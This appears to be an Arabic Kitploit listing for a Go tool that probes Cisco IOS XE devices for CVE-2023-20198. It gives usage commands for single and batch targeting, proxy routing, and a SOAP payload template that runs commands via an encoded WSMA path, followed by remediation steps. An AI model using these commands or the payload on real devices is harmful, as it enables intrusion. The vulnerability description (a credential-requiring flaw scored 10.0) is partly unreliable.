Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الشبكاتاختبار الاختراقالقيادة والسيطرة
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

ماسح ثغرات مبني على Go لاكتشاف CVE-2023-20198 في أجهزة Cisco IOS XE. يختبر واجهات SOAP/XML (WSMA) لتنفيذ تعليمات برمجية عن بُعد مع فحص دفعات وإنشاء تقارير HTML.

عرض المستودع
3منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة فحص Cisco CVE-2023-20198

إصدار Go الترخيص المنصة

ماسح ضوئي احترافي للثغرات الأمنية لكشف CVE-2023-20198 في أجهزة Cisco IOS XE. يختبر واجهات SOAP/XML الضعيفة (WSMA). صُمم لتقييمات الأمان المصرح بها وتدقيق الشبكات.

⚠️ إخلاء مسؤولية قانوني

لاختبار الأمان المصرح به فقط

هذه الأداة مخصصة حصريًا لما يلي:

  • الفحص الضوئي للثغرات المصرح به
  • تدقيق الأمان بموافقة خطية صريحة
  • تقييمات أمان الشبكات
  • أغراض تعليمية في بيئات مختبرية خاضعة للرقابة
  • اختبار الامتثال والاختراق

الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. تأكد دائمًا من حصولك على التصريح المناسب قبل اختبار أي أنظمة.


🚀 بداية سريعة

التثبيت

باستخدام (مُوصى به)

go install
root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

سيتم تثبيت الملف الثنائي في دليل $GOPATH/bin (عادةً ~/go/bin).

التثبيت اليدوي

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# بناء
go build -o cisco-cve-2023-20198-checker

# تثبيت (اختياري)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

الاستخدام الأساسي

root@kitploit:~
# فحص هدف واحد
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# فحص أهداف متعددة
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# إنشاء تقرير HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 الميزات

  • ✅ كشف الثغرات - اختبار لـ CVE-2023-20198 (WSMA RCE)
  • ✅ فحص هدف واحد ودفعة من الأهداف
  • ✅ دعم منفذ مخصص (الافتراضي: 443)
  • ✅ تنفيذ الأوامر عبر SOAP/XML
  • ✅ إنشاء تقارير HTML احترافية
  • ✅ لا تبعيات خارجية
  • ✅ عبر الأنظمة (Linux، macOS، Windows)
  • ✅ خيار تخطي شهادة SSL/TLS
  • ✅ مهلات قابلة للتكوين
  • ✅ دعم الوكيل (HTTP، HTTPS، SOCKS5)
  • ✅ وكلاء موثوقون
  • ✅ دعم متغيرات البيئة (HTTP_PROXY, HTTPS_PROXY)

🌐 دعم الوكيل

ممتاز للبيئات المؤسسية! يدعم:

  • وكلاء HTTP/HTTPS
  • وكلاء SOCKS5 (أنفاق SSH، Tor)
  • وكلاء موثوقون
  • متغيرات البيئة
root@kitploit:~
# وكيل HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (نفق SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# متغير بيئة
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

انظر PROXY_GUIDE.md للحصول على تفاصيل تكوين الوكيل.


💻 خيارات سطر الأوامر

العلامةالنوعالافتراضيالوصف
-targetstring-IP/اسم مضيف الهدف الفردي
-targets-filestring-ملف يحتوي على الأهداف (واحد لكل سطر)
-portint443منفذ HTTPS/SOAP
-usernamestringadminاسم مستخدم SOAP
-passwordstring-مطلوب. كلمة مرور SOAP
-commandstringuname -aالأمر المراد تنفيذه
-htmlboolfalseإنشاء تقرير HTML
-timeoutint10مهلة الطلب (بالثواني)
-skip-verifybooltrueتخطي التحقق من SSL
-proxystring-رابط الوكيل (http://، https://، socks5://)

📖 أمثلة الاستخدام

اختبار هدف واحد

root@kitploit:~
# فحص الثغرة الأساسي
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# منفذ مخصص
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# تنفيذ أمر محدد
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# إنشاء تقرير
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

اختبار دفعة

root@kitploit:~
# إنشاء ملف الأهداف
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# اختبار جميع الأهداف
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# دفعة مع تقرير HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

أوامر متقدمة

root@kitploit:~
# تعداد الشبكة
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# كشف الإصدار
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# عبر وكيل HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# عبر وكيل SOCKS5 (نفق SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# وكيل موثق
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 حول CVE-2023-20198

تفاصيل الثغرة

معرف CVE: CVE-2023-20198
درجة CVSS: 10.0 (حرجة)
النوع: تنفيذ أكواد عن بُعد (RCE)
المتأثر: واجهة Web UI من Cisco IOS XE (WSMA)

التفاصيل الفنية

  • النقطة: /%2577ebui_wsma_https (تجاوز ترميز المسار)
  • البروتوكول: SOAP 1.1 عبر HTTPS
  • المصادقة: WS-Security UsernameToken (بيانات اعتماد صالحة مطلوبة)
  • مساحة الأسماء: urn:cisco:wsma-exec
  • التأثير: اختراق كامل للجهاز ببيانات اعتماد صالحة

هيكل طلب SOAP

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ المعالجة

لمسؤولي الأنظمة

إذا كانت أجهزتك معرضة للخطر:

1. تعطيل WSMA (إن لم يكن مطلوبًا)

root@kitploit:~
no ip http server
no ip http secure-server

2. تقييد الوصول باستخدام قوائم التحكم بالوصول (ACLs)

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. تحديث البرامج الثابتة - تطبيق أحدث تصحيحات الأمان من Cisco

4. تفعيل المصادقة القوية

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. مراقبة السجلات - مراقبة النشاط المشبوه لـ SOAP/HTTP


🏗️ البناء من المصدر

المتطلبات الأساسية

  • Go 1.21 أو أعلى

البناء

root@kitploit:~
# بناء قياسي
go build -o cisco-cve-2023-20198-checker

# مُحسّن (ملف ثنائي أصغر)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# ترجمة متقاطعة لمنصات مختلفة
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 أمثلة الإخراج

إخراج الطرفية

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     فحص أمان SOAP/XML من Cisco                           ║
║     تقييم أمان تعليمي ومصرح به فقط                       ║
╚═══════════════════════════════════════════════════════════╝

[*] الأمر: show version
[*] المنفذ: 443
[*] المهلة: 10 ثوانٍ

[1/1] اختبار الهدف: 192.168.1.100:443
[*] جاري إرسال طلب SOAP...
[+] تم تلقي الرد (الحالة: 200)
[+] نجاح!

╔═══════════════════════════════════════════════════════════╗
║                    نتائج الدفعة                           ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - نجاح
Cisco IOS XE Software, الإصدار 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      الملخص                                ║
╚═══════════════════════════════════════════════════════════╝
إجمالي الأهداف: 1
ناجحة: 1
فاشلة: 0

تقرير HTML

تقرير تقييم أمان احترافي مع:

  • لوحة إحصائيات
  • تكوين مفصل
  • مخرجات الأوامر (بأسلوب الطرفية)
  • بيانات وصفية فنية
  • إخلاء مسؤولية قانوني

🤝 المساهمة

المساهمات مرحب بها! يرجى:

  1. عمل fork للمستودع
  2. إنشاء فرع ميزة
  3. إجراء التغييرات
  4. تقديم طلب سحب

📝 الترخيص

رخصة MIT - انظر ملف LICENSE


🔗 المراجع

  • استشارة أمان Cisco
  • تفاصيل CVE-2023-20198
  • أمان API من OWASP

⚖️ الإفصاح المسؤول

هذه الأداة مخصصة فقط لفحص الثغرات المصرح به. المؤلفون غير مسؤولين عن سوء الاستخدام. احصل دائمًا على إذن كتابي قبل اختبار أنظمة لا تملكها.


صُنع من أجل مجتمع الأمان 🛡️

تنزيل الأداة